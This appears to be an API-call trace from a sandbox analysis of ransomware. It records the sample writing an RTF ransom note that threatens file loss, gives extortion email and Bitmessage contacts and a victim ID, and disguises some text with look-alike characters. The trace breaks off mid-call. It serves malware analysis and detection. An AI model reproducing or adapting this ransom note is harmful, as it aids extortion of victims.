lpMultiByteStr=0x1ef4ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n5¼\x0b5Ø${ \x1c\x01y\x7f\x96\x15\x8eàwôß0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.761] WriteFile (in: hFile=0x294, lpBuffer=0x1ef4ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.764] CloseHandle (hObject=0x294) returned 1 [0297.764] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\#readme_eman#.rtf")) returned 0xffffffff [0297.764] GetLastError () returned 0x2 [0297.764] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.765] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.765] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.765] WideCharToMultiByte (in: 